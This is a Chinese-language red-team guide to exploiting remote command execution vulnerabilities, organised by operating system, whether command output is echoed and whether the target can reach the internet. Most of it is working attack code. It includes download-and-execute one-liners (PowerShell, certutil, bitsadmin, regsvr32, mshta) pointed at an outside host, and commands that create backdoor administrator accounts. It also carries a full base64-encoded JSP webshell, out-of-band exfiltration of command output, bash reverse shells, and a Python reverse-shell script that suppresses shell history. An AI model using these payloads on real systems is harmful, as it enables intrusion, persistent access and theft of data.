命令执行漏洞总结

在红蓝对抗中,远程命令执行类漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令的漏洞的有各种JAVA反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL注入漏洞等。远程命令执行类漏洞从漏洞探测到漏洞利用其实都非常讲究技巧。如果在进行漏洞探测阶段考虑的情况不全就会很容易遗漏漏洞,与漏洞擦肩而过;在漏洞利用阶段如果知识面不广(姿势不够多)的话可能就会陷入苦苦挣扎却无法获取权限的困境。

从大方向上看,远程命令执行类漏洞在漏洞利用阶段关注的问题主要是三个:目标操作系统类型、执行命令结果是否有回显以及是否能通外网。针对不同的操作系统,执行命令各有差异。另外,目标是否有回显是漏洞利用的难易程度的关键因素之一,一般来说,可以回显的漏洞要比无回显的漏洞利用要容易得多(当然也可以通过其他方法让原本无回显的漏洞得到回显,这里先不讨论这种情况)。最后目标是否能通外网也是直接影响漏洞利用的关键因素,如果漏洞无回显并且也不通外网,那漏洞利用可的难度就大大增加了。从更加细节的角度去考虑,针对不同的漏洞,不同的环境,需要考虑的额外因素就更多了。比如操作系统是否存在或者可以执行某个命令、目标是否安装杀软、命令中的特殊符号等问题。以下就远程命令执行漏洞的利用技巧做一个简单的总结。

Windows

场景一

是否有回显:是
是否通外网:是

解决思路:
有回显也可以通外网的场景是最简单,获取权限的方法也是多样的,以下主要简单总结一些常见的方法或思路

方法一:确认Web应用物理路径,然后写入webshell (参考场景二)

方法二:远程下载并执行
a)powershell

1
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/p'))"

b)certutil

1
certutil -urlcache -split -f http://x.x.x.x/test.exe C:\\Windows\\Temp\\test.exe&&C:\\Windows\\Temp\\test.exe

c)bitsadmin

1
bitsadmin /transfer n http://x.x.x.x/test.exe C:\\Windows\\Temp\\test.exe&&C:\\Windows\\Temp\\test.exe

d)regsvr32

1
regsvr32 /s /n /u /i:http://x.x.x.x/r scrobj.dll

e)mshta

1
mshta  http://x.x.x.x/test.hta

方法三:如果目标开放远程桌面端口的话,并且权限足够可以直接执行命令添加账号(内网比较常见)

1
2
3
4
5
6
net user test test@123qaz /add
net localgroup administrators test /add
或者启用guest账号:
net user guest /active:yes
net user guest guest@123qaz
net localgroup administrators guest /add

场景二

是否有回显:是
是否通外网:否

解决思路:针对这种场景,解决方法就比较灵活了。因为不通外网,所以主思路还是想办法写入webshell。

1.确认Web应用物理路径

1
2
3
dir /s/a-d/b /WEB-INF/web.xml
或者
for /r c:\ %i in (checkCode.js*) do @echo %i

2.写入webshell,需要考虑webshell特殊符号问题,可以先做base64编码写入

1
echo -----BEGIN CERTIFICATE----- >D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt&&echo PCVAcGFnZSBpbXBvcnQ9ImphdmEuaW8uKixqYXZhLnV0aWwuKixqYXZhLm5ldC4qLGphdmEuc3FsLiosamF2YS50ZXh0LioiJT48JSFTdHJpbmcgUHdkPSIxMTAiO1N0cmluZyBjcz0iVVRGLTgiO1N0cmluZyBFQyhTdHJpbmcgcyl0aHJvd3MgRXhjZXB0aW9ue3JldHVybiBuZXcgU3RyaW5nKHMuZ2V0Qnl0ZXMoIklTTy04ODU5LTEiKSxjcyk7fUNvbm5lY3Rpb24gR0MoU3RyaW5nIHMpdGhyb3dzIEV4Y2VwdGlvbntTdHJpbmdbXSB4PXMudHJpbSgpLnNwbGl0KCJcclxuIik7Q2xhc3MuZm9yTmFtZSh4WzBdLnRyaW0oKSk7aWYoeFsxXS5pbmRleE9mKCJqZGJjOm9yYWNsZSIpIT0tMSl7cmV0dXJuIERyaXZlck1hbmFnZXIuZ2V0Q29ubmVjdGlvbih4WzFdLnRyaW0oKSsiOiIreFs0XSx4WzJdLmVxdWFsc0lnbm9yZUNhc2UoIlsvbnVsbF0iKT8iIjp4WzJdLHhbM10uZXF1YWxzSWdub3JlQ2FzZSgiWy9udWxsXSIpPyIiOnhbM10pO31lbHNle0Nvbm5lY3Rpb24gYz1Ecml2ZXJNYW5hZ2VyLmdldENvbm5lY3Rpb24oeFsxXS50cmltKCkseFsyXS5lcXVhbHNJZ25vcmVDYXNlKCJbL251bGxdIik/IiI6eFsyXSx4WzNdLmVxdWFsc0lnbm9yZUNhc2UoIlsvbnVsbF0iKT8iIjp4WzNdKTtpZih4Lmxlbmd0aD40KXtjLnNldENhdGFsb2coeFs0XSk7fXJldHVybiBjO319dm9pZCBBQShTdHJpbmdCdWZmZXIgc2IpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIHJbXT1GaWxlLmxpc3RSb290cygpO2ZvcihpbnQgaT0wO2k8ci5sZW5ndGg7aSsrKXtzYi5hcHBlbmQocltpXS50b1N0cmluZygpLnN1YnN0cmluZygwLDIpKTt9fXZvaWQgQkIoU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257RmlsZSBvRj1uZXcgRmlsZShzKSxsW109b0YubGlzdEZpbGVzKCk7U3RyaW5nIHNULHNRLHNGPSIiO2phdmEudXRpbC5EYXRlIGR0O1NpbXBsZURhdGVGb3JtYXQgZm09bmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eXktTU0tZGQgSEg6bW06c3MiKTtmb3IoaW50IGk9MDsgaTxsLmxlbmd0aDsgaSsrKXtkdD1uZXcgamF2YS51dGlsLkRhdGUobFtpXS5sYXN0TW9kaWZpZWQoKSk7c1Q9Zm0uZm9ybWF0KGR0KTtzUT1sW2ldLmNhblJlYWQoKT8iUiI6IiI7c1EgKz1sW2ldLmNhbldyaXRlKCk/IiBXIjoiIjtpZihsW2ldLmlzRGlyZWN0b3J5KCkpe3NiLmFwcGVuZChsW2ldLmdldE5hbWUoKSsiL1x0IitzVCsiXHQiK2xbaV0ubGVuZ3RoKCkrIlx0IitzUSsiXG4iKTt9ZWxzZXtzRis9bFtpXS5nZXROYW1lKCkrIlx0IitzVCsiXHQiK2xbaV0ubGVuZ3RoKCkrIlx0IitzUSsiXG4iO319c2IuYXBwZW5kKHNGKTt9dm9pZCBFRShTdHJpbmcgcyl0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgZj1uZXcgRmlsZShzKTtpZihmLmlzRGlyZWN0b3J5KCkpe0ZpbGUgeFtdPWYubGlzdEZpbGVzKCk7Zm9yKGludCBrPTA7IGsgPCB4Lmxlbmd0aDsgaysrKXtpZigheFtrXS5kZWxldGUoKSl7RUUoeFtrXS5nZXRQYXRoKCkpO319fWYuZGVsZXRlKCk7fXZvaWQgRkYoU3RyaW5nIHMsSHR0cFNlcnZsZXRSZXNwb25zZSByKXRocm93cyBFeGNlcHRpb257aW50IG47Ynl0ZVtdIGI9bmV3IGJ5dGVbNTEyXTtyLnJlc2V0KCk7U2VydmxldE91dHB1dFN0cmVhbSBvcz1yLmdldE91dHB1dFN0cmVhbSgpO0J1ZmZlcmVkSW5wdXRTdHJlYW0gaXM9bmV3IEJ1ZmZlcmVkSW5wdXRTdHJlYW0obmV3IEZpbGVJbnB1dFN0cmVhbShzKSk7b3Mud3JpdGUoKCItPiIrInwiKS5nZXRCeXRlcygpLDAsMyk7d2hpbGUoKG49aXMucmVhZChiLDAsNTEyKSkhPS0xKXtvcy53cml0ZShiLDAsbik7fW9zLndyaXRlKCgifCIrIjwtIikuZ2V0Qnl0ZXMoKSwwLDMpO29zLmNsb3NlKCk7aXMuY2xvc2UoKTt9dm9pZCBHRyhTdHJpbmcgcyxTdHJpbmcgZCl0aHJvd3MgRXhjZXB0aW9ue1N0cmluZyBoPSIwMTIzNDU2Nzg5QUJDREVGIjtGaWxlIGY9bmV3IEZpbGUocyk7Zi5jcmVhdGVOZXdGaWxlKCk7RmlsZU91dHB1dFN0cmVhbSBvcz1uZXcgRmlsZU91dHB1dFN0cmVhbShmKTtmb3IoaW50IGk9MDsgaTxkLmxlbmd0aCgpO2krPTIpe29zLndyaXRlKChoLmluZGV4T2YoZC5jaGFyQXQoaSkpIDw8IDQgfCBoLmluZGV4T2YoZC5jaGFyQXQoaSsxKSkpKTt9b3MuY2xvc2UoKTt9dm9pZCBISChTdHJpbmcgcyxTdHJpbmcgZCl0aHJvd3MgRXhjZXB0aW9ue0ZpbGUgc2Y9bmV3IEZpbGUocyksZGY9bmV3IEZpbGUoZCk7aWYoc2YuaXNEaXJlY3RvcnkoKSl7aWYoIWRmLmV4aXN0cygpKXtkZi5ta2RpcigpO31GaWxlIHpbXT1zZi5saXN0RmlsZXMoKTtmb3IoaW50IGo9MDsgajx6Lmxlbmd0aDsgaisrKXtISChzKyIvIit6W2pdLmdldE5hbWUoKSxkKyIvIit6W2pdLmdldE5hbWUoKSk7fX1lbHNle0ZpbGVJbnB1dFN0cmVhbSBpcz1uZXcgRmlsZUlucHV0U3RyZWFtKHNmKTtGaWxlT3V0cHV0U3RyZWFtIG9zPW5ldyBGaWxlT3V0cHV0U3RyZWFtKGRmKTtpbnQgbjtieXRlW10gYj1uZXcgYnl0ZVs1MTJdO3doaWxlKChuPWlzLnJlYWQoYiwwLDUxMikpIT0tMSl7b3Mud3JpdGUoYiwwLG4pO31pcy5jbG9zZSgpO29zLmNsb3NlKCk7fX12b2lkIElJKFN0cmluZyBzLFN0cmluZyBkKXRocm93cyBFeGNlcHRpb257RmlsZSBzZj1uZXcgRmlsZShzKSxkZj1uZXcgRmlsZShkKTtzZi5yZW5hbWVUbyhkZik7fXZvaWQgSkooU3RyaW5nIHMpdGhyb3dzIEV4Y2VwdGlvbntGaWxlIGY9bmV3IEZpbGUocyk7Zi5ta2RpcigpO312b2lkIEtLKFN0cmluZyBzLFN0cmluZyB0KXRocm93cyBFeGNlcHRpb257RmlsZSBmPW5ldyBGaWxlKHMpO1NpbXBsZURhdGVGb3JtYXQgZm09bmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eXktTU0tZGQgSEg6bW06c3MiKTtqYXZhLnV0aWwuRGF0ZSBkdD1mbS5wYXJzZSh0KTtmLnNldExhc3RNb2RpZmllZChkdC5nZXRUaW1lKCkpO312b2lkIExMKFN0cmluZyBzLFN0cmluZyBkKXRocm93cyBFeGNlcHRpb257VVJMIHU9bmV3IFVSTChzKTtpbnQgbj0wO0ZpbGVPdXRwdXRTdHJlYW0gb3M9bmV3IEZpbGVPdXRwdXRTdHJlYW0oZCk7SHR0cFVSTENvbm5lY3Rpb24gaD0oSHR0cFVSTENvbm5lY3Rpb24pIHUub3BlbkNvbm5lY3Rpb24oKTtJbnB1dFN0cmVhbSBpcz1oLmdldElucHV0U3RyZWFtKCk7Ynl0ZVtdIGI9bmV3IGJ5dGVbNTEyXTt3aGlsZSgobj1pcy5yZWFkKGIpKSE9LTEpe29zLndyaXRlKGIsMCxuKTt9b3MuY2xvc2UoKTtpcy5jbG9zZSgpO2guZGlzY29ubmVjdCgpO312b2lkIE1NKElucHV0U3RyZWFtIGlzLFN0cmluZ0J1ZmZlciBzYil0aHJvd3MgRXhjZXB0aW9ue1N0cmluZyBsO0J1ZmZlcmVkUmVhZGVyIGJyPW5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIoaXMpKTt3aGlsZSgobD1ici5yZWFkTGluZSgpKSE9bnVsbCl7c2IuYXBwZW5kKGwrIlxyXG4iKTt9fXZvaWQgTk4oU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257Q29ubmVjdGlvbiBjPUdDKHMpO1Jlc3VsdFNldCByPXMuaW5kZXhPZigiamRiYzpvcmFjbGUiKSE9LTE/Yy5nZXRNZXRhRGF0YSgpLmdldFNjaGVtYXMoKTpjLmdldE1ldGFEYXRhKCkuZ2V0Q2F0YWxvZ3MoKTt3aGlsZShyLm5leHQoKSl7c2IuYXBwZW5kKHIuZ2V0U3RyaW5nKDEpKyJcdCIpO31yLmNsb3NlKCk7Yy5jbG9zZSgpO312b2lkIE9PKFN0cmluZyBzLFN0cmluZ0J1ZmZlciBzYil0aHJvd3MgRXhjZXB0aW9ue0Nvbm5lY3Rpb24gYz1HQyhzKTtTdHJpbmdbXSB4PXMudHJpbSgpLnNwbGl0KCJcclxuIik7UmVzdWx0U2V0IHI9Yy5nZXRNZXRhRGF0YSgpLmdldFRhYmxlcyhudWxsLHMuaW5kZXhPZigiamRiYzpvcmFjbGUiKSE9LTE/eC5sZW5ndGg+NT94WzVdOnhbNF06bnVsbCwiJSIsbmV3IFN0cmluZ1tdeyJUQUJMRSJ9KTt3aGlsZShyLm5leHQoKSl7c2IuYXBwZW5kKHIuZ2V0U3RyaW5nKCJUQUJMRV9OQU1FIikrIlx0Iik7fXIuY2xvc2UoKTtjLmNsb3NlKCk7fXZvaWQgUFAoU3RyaW5nIHMsU3RyaW5nQnVmZmVyIHNiKXRocm93cyBFeGNlcHRpb257U3RyaW5nW10geD1zLnRyaW0oKS5zcGxpdCgiXHJcbiIpO0Nvbm5lY3Rpb24gYz1HQyhzKTtTdGF0ZW1lbnQgbT1jLmNyZWF0ZVN0YXRlbWVudCgxMDA1LDEwMDcpO1Jlc3VsdFNldCByPW0uZXhlY3V0ZVF1ZXJ5KCJzZWxlY3QgKiBmcm9tICIreFt4Lmxlbmd0aC0xXSk7UmVzdWx0U2V0TWV0YURhdGEgZD1yLmdldE1ldGFEYXRhKCk7Zm9yKGludCBpPTE7aTw9ZC5nZXRDb2x1bW5Db3VudCgpO2krKyl7c2IuYXBwZW5kKGQuZ2V0Q29sdW1uTmFtZShpKSsiICgiK2QuZ2V0Q29sdW1uVHlwZU5hbWUoaSkrIilcdCIpO31yLmNsb3NlKCk7bS5jbG9zZSgpO2MuY2xvc2UoKTt9dm9pZCBRUShTdHJpbmcgY3MsU3RyaW5nIHMsU3RyaW5nIHEsU3RyaW5nQnVmZmVyIHNiLFN0cmluZyBwKXRocm93cyBFeGNlcHRpb257Q29ubmVjdGlvbiBjPUdDKHMpO1N0YXRlbWVudCBtPWMuY3JlYXRlU3RhdGVtZW50KDEwMDUsMTAwOCk7QnVmZmVyZWRXcml0ZXIgYnc9bnVsbDt0cnl7UmVzdWx0U2V0IHI9bS5leGVjdXRlUXVlcnkocS5pbmRleE9mKCItLWY6IikhPS0xP3Euc3Vic3RyaW5nKDAscS5pbmRleE9mKCItLWY6IikpOnEpO1Jlc3VsdFNldE1ldGFEYXRhIGQ9ci5nZXRNZXRhRGF0YSgpO2ludCBuPWQuZ2V0Q29sdW1uQ291bnQoKTtmb3IoaW50IGk9MTsgaSA8PW47IGkrKyl7c2IuYXBwZW5kKGQuZ2V0Q29sdW1uTmFtZShpKSsiXHR8XHQiKTt9c2IuYXBwZW5kKCJcclxuIik7aWYocS5pbmRleE9mKCItLWY6IikhPS0xKXtGaWxlIGZpbGU9bmV3IEZpbGUocCk7aWYocS5pbmRleE9mKCItdG86Iik9PS0xKXtmaWxlLm1rZGlyKCk7fWJ3PW5ldyBCdWZmZXJlZFdyaXRlcihuZXcgT3V0cHV0U3RyZWFtV3JpdGVyKG5ldyBGaWxlT3V0cHV0U3RyZWFtKG5ldyBGaWxlKHEuaW5kZXhPZigiLXRvOiIpIT0tMT9wLnRyaW0oKTpwK3Euc3Vic3RyaW5nKHEuaW5kZXhPZigiLS1mOiIpKzQscS5sZW5ndGgoKSkudHJpbSgpKSx0cnVlKSxjcykpO313aGlsZShyLm5leHQoKSl7Zm9yKGludCBpPTE7IGk8PW47aSsrKXtpZihxLmluZGV4T2YoIi0tZjoiKSE9LTEpe2J3LndyaXRlKHIuZ2V0T2JqZWN0KGkpKyIiKyJcdCIpO2J3LmZsdXNoKCk7fWVsc2V7c2IuYXBwZW5kKHIuZ2V0T2JqZWN0KGkpKyIiKyJcdHxcdCIpO319aWYoYnchPW51bGwpe2J3Lm5ld0xpbmUoKTt9c2IuYXBwZW5kKCJcclxuIik7fXIuY2xvc2UoKTtpZihidyE9bnVsbCl7YncuY2xvc2UoKTt9fWNhdGNoKEV4Y2VwdGlvbiBlKXtzYi5hcHBlbmQoIlJlc3VsdFx0fFx0XHJcbiIpO3RyeXttLmV4ZWN1dGVVcGRhdGUocSk7c2IuYXBwZW5kKCJFeGVjdXRlIFN1Y2Nlc3NmdWxseSFcdHxcdFxyXG4iKTt9Y2F0Y2goRXhjZXB0aW9uIGVlKXtzYi5hcHBlbmQoZWUudG9TdHJpbmcoKSsiXHR8XHRcclxuIik7fX1tLmNsb3NlKCk7Yy5jbG9zZSgpO30lPjwlY3M9cmVxdWVzdC5nZXRQYXJhbWV0ZXIoInowIikhPW51bGw/cmVxdWVzdC5nZXRQYXJhbWV0ZXIoInowIikrIiI6Y3M7cmVzcG9uc2Uuc2V0Q29udGVudFR5cGUoInRleHQvaHRtbCIpO3Jlc3BvbnNlLnNldENoYXJhY3RlckVuY29kaW5nKGNzKTtTdHJpbmdCdWZmZXIgc2I9bmV3IFN0cmluZ0J1ZmZlcigiIik7dHJ5e1N0cmluZyBaPUVDKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKFB3ZCkrIiIpO1N0cmluZyB6MT1FQyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiejEiKSsiIik7U3RyaW5nIHoyPUVDKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJ6MiIpKyIiKTtzYi5hcHBlbmQoIi0+IisifCIpO1N0cmluZyBzPXJlcXVlc3QuZ2V0U2Vzc2lvbigpLmdldFNlcnZsZXRDb250ZXh0KCkuZ2V0UmVhbFBhdGgoIi8iKTtpZihaLmVxdWFscygiQSIpKXtzYi5hcHBlbmQocysiXHQiKTtpZighcy5zdWJzdHJpbmcoMCwxKS5lcXVhbHMoIi8iKSl7QUEoc2IpO319ZWxzZSBpZihaLmVxdWFscygiQiIpKXtCQih6MSxzYik7fWVsc2UgaWYoWi5lcXVhbHMoIkMiKSl7U3RyaW5nIGw9IiI7QnVmZmVyZWRSZWFkZXIgYnI9bmV3IEJ1ZmZlcmVkUmVhZGVyKG5ldyBJbnB1dFN0cmVhbVJlYWRlcihuZXcgRmlsZUlucHV0U3RyZWFtKG5ldyBGaWxlKHoxKSkpKTt3aGlsZSgobD1ici5yZWFkTGluZSgpKSE9bnVsbCl7c2IuYXBwZW5kKGwrIlxyXG4iKTt9YnIuY2xvc2UoKTt9ZWxzZSBpZihaLmVxdWFscygiRCIpKXtCdWZmZXJlZFdyaXRlciBidz1uZXcgQnVmZmVyZWRXcml0ZXIobmV3IE91dHB1dFN0cmVhbVdyaXRlcihuZXcgRmlsZU91dHB1dFN0cmVhbShuZXcgRmlsZSh6MSkpKSk7Yncud3JpdGUoejIpO2J3LmNsb3NlKCk7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIkUiKSl7RUUoejEpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJGIikpe0ZGKHoxLHJlc3BvbnNlKTt9ZWxzZSBpZihaLmVxdWFscygiRyIpKXtHRyh6MSx6Mik7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIkgiKSl7SEgoejEsejIpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJJIikpe0lJKHoxLHoyKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiSiIpKXtKSih6MSk7c2IuYXBwZW5kKCIxIik7fWVsc2UgaWYoWi5lcXVhbHMoIksiKSl7S0soejEsejIpO3NiLmFwcGVuZCgiMSIpO31lbHNlIGlmKFouZXF1YWxzKCJMIikpe0xMKHoxLHoyKTtzYi5hcHBlbmQoIjEiKTt9ZWxzZSBpZihaLmVxdWFscygiTSIpKXtTdHJpbmdbXSBjPXt6MS5zdWJzdHJpbmcoMiksejEuc3Vic3RyaW5nKDAsMiksejJ9O1Byb2Nlc3MgcD1SdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO01NKHAuZ2V0SW5wdXRTdHJlYW0oKSxzYik7TU0ocC5nZXRFcnJvclN0cmVhbSgpLHNiKTt9ZWxzZSBpZihaLmVxdWFscygiTiIpKXtOTih6MSxzYik7fWVsc2UgaWYoWi5lcXVhbHMoIk8iKSl7T08oejEsc2IpO31lbHNlIGlmKFouZXF1YWxzKCJQIikpe1BQKHoxLHNiKTt9ZWxzZSBpZihaLmVxdWFscygiUSIpKXtRUShjcyx6MSx6MixzYix6Mi5pbmRleE9mKCItdG86IikhPS0xP3oyLnN1YnN0cmluZyh6Mi5pbmRleE9mKCItdG86IikrNCx6Mi5sZW5ndGgoKSk6cy5yZXBsYWNlQWxsKCJcXFxcIiwiLyIpKyJpbWFnZXMvIik7fX1jYXRjaChFeGNlcHRpb24gZSl7c2IuYXBwZW5kKCJFUlJPUiIrIjovLyAiK2UudG9TdHJpbmcoKSk7fXNiLmFwcGVuZCgifCIrIjwtIik7b3V0LnByaW50KHNiLnRvU3RyaW5nKCkpOyU+ >>D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt&&echo -----END CERTIFICATE----- >>D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt

3.使用certutil解码

1
certutil -decode D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.txt D:\\OA\\apache-tomcat-7.0.91\\webapps\\ROOT\\shell.jsp

场景三

是否有回显:否
是否通外网:是

解决思路:
方法一:远程下载并执行(参考场景一方法二)

方法二:OOB

1
2
for /f %i in ('whoami') do certutil -urlcache -split -f http://x.x.x.x/%i  #执行whoami命令并将结果发送至DNSLog
for /r c:\ %i in (checkCode.js*) do certutil -urlcache -split -f http://x.x.x.x/%i #寻找Web应用路径并将结果发送至DNSLog

场景四

是否有回显:否
是否通外网:否

解决思路:直接盲打
1.直接盲打,定位Web路径并写入结果文件

1
for /r C:\ %i in (test.css*) do whoami > %i/../test.txt

Linux

场景一

是否有回显:是
是否通外网:是

解决思路:最简单的场景,方法很多
方法一:确认Web应用物理路径,然后写入webshell
1.执行pwd、ls等命令确认一下Web路径在哪里
2.写入webshell

1
echo webshell的base64编码内容 |base64 -d > Web应用目录/test.jsp  #echo命令直接写入webshell

方法二:反弹shell,方法很多,不一一列出
a)bash

1
2
3
bash -i >& /dev/tcp/ip/port 0>&1
或者
exec 5<>/dev/tcp/ip/port;cat <&5|while read line;do $line >&5 2>&1;done

b)python
1.wget或curl下载python反弹脚本,然后执行

1
wget -O /tmp/test.py http://x.x.x.x/test.py

2.python反弹脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import sys,os,socket,pty
shell = "/bin/sh"
def usage(name):
print 'python reverse connector'
print 'usage: %s <ip_addr> <port>' % name

def main():
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit()
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1],int(sys.argv[2])))
print 'connect ok'
except:
print 'connect faild'
sys.exit()
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
os.unsetenv("HISTSIZE")
os.unsetenv("HISTORY")
os.unsetenv("HISTSAVE")
os.unsetenv("HISTZONE")
os.unsetenv("HISTLOG")
os.unsetenv("HISTCMD")
os.putenv("HISTFILE",'/dev/null')
os.putenv("HISTSIZE",'0')
os.putenv("HISTFILESIZE",'0')
pty.spawn(shell)
s.close()

if __name__ == '__main__':
main()

场景二

是否有回显:是
是否通外网:否

解决思路:针对这种场景,解决方法就比较灵活了。因为不通外网,所以主思路还是想办法写入webshell。参考场景一方法一。

场景三

是否有回显:否
是否通外网:是

解决思路:
方法一:直接反弹shell,参考场景一方法二

方法二:OOB
1.定位Web应用目录

1
wget http://x.x.x.x/`pwd|base64`  #大致确认一下当前目录,再通过ls、cd等命令获取Web应用目录,并发送结果至DNSLog

2.写入webshell

1
echo webshell的base64编码内容 |base64 -d > Web应用目录/test.jsp  #echo命令直接写入webshell

场景四

是否有回显:否
是否通外网:否

解决思路:最艰难的情况,直接盲打
1.直接盲打,定位Web路径并写入结果文件

1
find /|grep check.js|while read f;do sh -c "whoami" >$(dirname $f)/test.txt;done